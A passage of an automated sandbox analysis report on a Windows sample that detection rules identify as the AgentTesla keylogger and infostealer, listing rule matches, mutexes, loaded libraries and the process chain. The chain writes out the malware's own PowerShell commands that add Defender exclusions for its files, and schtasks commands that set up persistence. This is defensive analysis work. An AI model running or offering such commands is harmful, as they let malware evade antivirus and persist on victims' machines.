                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0515000622_2_05150006
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0515004022_2_05150040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754418022_2_07544180
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_07542B5822_2_07542B58
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_07544A8022_2_07544A80
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754C73022_2_0754C730
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754354822_2_07543548
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754353B22_2_0754353B
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754E21022_2_0754E210
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754C2F822_2_0754C2F8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754315022_2_07543150
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754314022_2_07543140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754417022_2_07544170
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754004022_2_07540040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754000622_2_07540006
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754503022_2_07545030
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754502122_2_07545021
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_07542FAB22_2_07542FAB
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_07542E1022_2_07542E10
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_07542E0322_2_07542E03
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754BEC022_2_0754BEC0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754DDD822_2_0754DDD8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_07542B4B22_2_07542B4B
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_07544A7122_2_07544A71
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0754390822_2_07543908
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_075438F822_2_075438F8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0913031822_2_09130318
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_091323E022_2_091323E0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0913030822_2_09130308
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0913031822_2_09130318
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0682C3FC25_2_0682C3FC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0682387425_2_06823874
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_068252A225_2_068252A2
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_068252A825_2_068252A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_06825F9625_2_06825F96
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_068356B025_2_068356B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0683670825_2_06836708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0683358025_2_06833580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0683004025_2_06830040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_06837E9825_2_06837E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_068377B825_2_068377B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0683E4D025_2_0683E4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0683234B25_2_0683234B
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_06835DFF25_2_06835DFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0683000725_2_06830007
                    Source: s2Jg1MAahY.exeStatic PE information: invalid certificate
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1779200822.00000000058E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1773872051.0000000003F15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1773872051.0000000004735000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1772419598.00000000011DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exe, 00000000.00000000.1713017930.0000000000B22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJghe.exe4 vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1773290594.0000000003115000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exe, 00000000.00000002.1782965166.000000000BA80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exe, 00000008.00000002.2968972015.00000000012F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exeBinary or memory string: OriginalFilenameJghe.exe4 vs s2Jg1MAahY.exe
                    Source: s2Jg1MAahY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 15.2.sgxIb.exe.505fdb0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.sgxIb.exe.505fdb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.s2Jg1MAahY.exe.4aceda0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.s2Jg1MAahY.exe.4aceda0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.s2Jg1MAahY.exe.4a92580.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.s2Jg1MAahY.exe.4a92580.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.GedTanqRR.exe.4c79a38.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.GedTanqRR.exe.4c79a38.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 15.2.sgxIb.exe.5023590.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.sgxIb.exe.5023590.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.s2Jg1MAahY.exe.4aceda0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.s2Jg1MAahY.exe.4aceda0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 15.2.sgxIb.exe.5023590.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.sgxIb.exe.5023590.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.GedTanqRR.exe.4c79a38.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.GedTanqRR.exe.4c79a38.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.s2Jg1MAahY.exe.4a92580.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.s2Jg1MAahY.exe.4a92580.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.GedTanqRR.exe.4c3d218.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 15.2.sgxIb.exe.505fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.sgxIb.exe.505fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: s2Jg1MAahY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GedTanqRR.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sgxIb.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/20@2/2
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile created: C:\Users\user\AppData\Roaming\GedTanqRR.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: \Sessions\1\BaseNamedObjects\oHNByndhbEJXlbuFCpVKa
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF8DD.tmpJump to behavior
                    Source: s2Jg1MAahY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: s2Jg1MAahY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: s2Jg1MAahY.exeVirustotal: Detection: 69%
                    Source: s2Jg1MAahY.exeReversingLabs: Detection: 78%
                    Source: s2Jg1MAahY.exeString found in binary or memory: PageCount-Start date is missing.MHistory is not available before '{0}'.
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile read: C:\Users\user\Desktop\s2Jg1MAahY.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\s2Jg1MAahY.exe "C:\Users\user\Desktop\s2Jg1MAahY.exe"
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GedTanqRR.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Users\user\Desktop\s2Jg1MAahY.exe "C:\Users\user\Desktop\s2Jg1MAahY.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\GedTanqRR.exe C:\Users\user\AppData\Roaming\GedTanqRR.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpE4A.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess created: C:\Users\user\AppData\Roaming\GedTanqRR.exe "C:\Users\user\AppData\Roaming\GedTanqRR.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp30F5.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp50A2.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\s2Jg1MAahY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GedTanqRR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Users\user\Desktop\s2Jg1MAahY.exe "C:\Users\user\Desktop\s2Jg1MAahY.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpE4A.tmp"
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess created: C:\Users\user\AppData\Roaming\GedTanqRR.exe "C:\Users\user\AppData\Roaming\GedTanqRR.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp30F5.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp50A2.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
